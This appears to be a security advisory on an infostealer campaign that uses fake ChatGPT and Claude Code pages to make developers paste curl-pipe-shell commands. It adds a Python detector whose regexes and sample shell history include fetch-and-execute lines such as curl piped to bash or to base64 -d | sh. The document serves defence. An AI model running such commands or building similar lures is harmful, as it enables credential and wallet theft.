The MacSync infostealer campaign (active November 2025 through at least March 2026) targets software developers on macOS and Windows via ClickFix-style lure pages impersonating ChatGPT and Anthropic Claude Code. The pages trick victims into executing curl-pipe-shell payloads that harvest browser credentials, session cookies, and cryptocurrency wallet contents from Exodus, Atomic, and Ledger. No CVE is assigned, as this is a social engineering vector.

Organizations with developer staff, particularly those holding cryptocurrency assets or accessing privileged internal systems, should circulate an advisory on the lure pattern, search shell history for curl-pipe-shell executions against unrecognized domains, and review macOS LaunchAgent directories and Chrome credential store access events for compromise indicators. As a policy control, prohibit curl-pipe-shell execution without prior code review.
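One way to run the shell-history search recommended above, as an added example that is not part of the original advisory: it flags zsh/bash history lines that fetch a URL with curl or wget and hand the result to a shell, unless the host is on a reviewed allowlist. The allowlist, the function name and the sample history lines are constructed assumptions, and it covers Unix shell history only, not PowerShell.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts whose install scripts your organization has reviewed.
# Matching is exact; subdomains are not implied.
ALLOWED_HOSTS = {"tools.corp.example"}

# curl/wget followed (after options) by a URL; the URL is the only capture group.
FETCH = r"(?:curl|wget)\b[^|;&]*?(https?://[^\s\"'|;)]+)"
# sh, bash, zsh, dash or ksh, optionally via sudo or a path, but not "ssh" or "x.sh".
SHELL = r"(?:sudo\s+)?(?:\S*/)?(?<![\w.-])(?:ba|z|da|k)?sh\b"
PATTERNS = [
    # curl URL | sh, including intermediate stages such as "| base64 -d | sh";
    # the lookarounds skip the "||" operator.
    re.compile(FETCH + r"[^;]*?(?<!\|)\|(?!\|)\s*" + SHELL),
    # sh -c "$(curl URL)"
    re.compile(SHELL + r"\s+(?:-c\s+)?[\"']?\$\(\s*" + FETCH),
    # bash <(curl URL)
    re.compile(SHELL + r"\s+<\(\s*" + FETCH),
]
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh EXTENDED_HISTORY timestamp prefix

# Constructed sample history (not campaign data); .invalid and .example are reserved.
SAMPLE_HISTORY = """\
: 1764000000:0;git pull --rebase
: 1764000050:0;curl -fsSL https://lure.example.invalid/install.sh | bash
/bin/bash -c "$(curl -fsSL https://tools.corp.example/bootstrap.sh)"
curl -s "https://cdn.example.invalid/a?x=1&y=2" | base64 -d | sh
bash <(curl -s https://get.example.invalid/setup)
curl -O https://example.invalid/file.tar.gz
curl https://example.invalid/status || sh notify.sh
"""

def find_suspect_fetches(history_text, allowed=ALLOWED_HOSTS):
    """Return (line_no, host, command) for fetch-and-execute lines to unlisted hosts."""
    hits = []
    for line_no, raw in enumerate(history_text.splitlines(), 1):
        cmd = ZSH_PREFIX.sub("", raw.strip())
        for pattern in PATTERNS:
            match = pattern.search(cmd)
            if match:
                host = (urlparse(match.group(1)).hostname or "").lower()
                if host not in allowed:
                    hits.append((line_no, host, cmd))
                break  # one verdict per history line
    return hits

if __name__ == "__main__":
    for line_no, host, cmd in find_suspect_fetches(SAMPLE_HISTORY):
        print(f"line {line_no}: {host}: {cmd}")
```

When reading real `~/.zsh_history` or `~/.bash_history` files, open them with `errors="replace"`, since zsh can write non-UTF-8 bytes into its history file.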

Author

claude-agent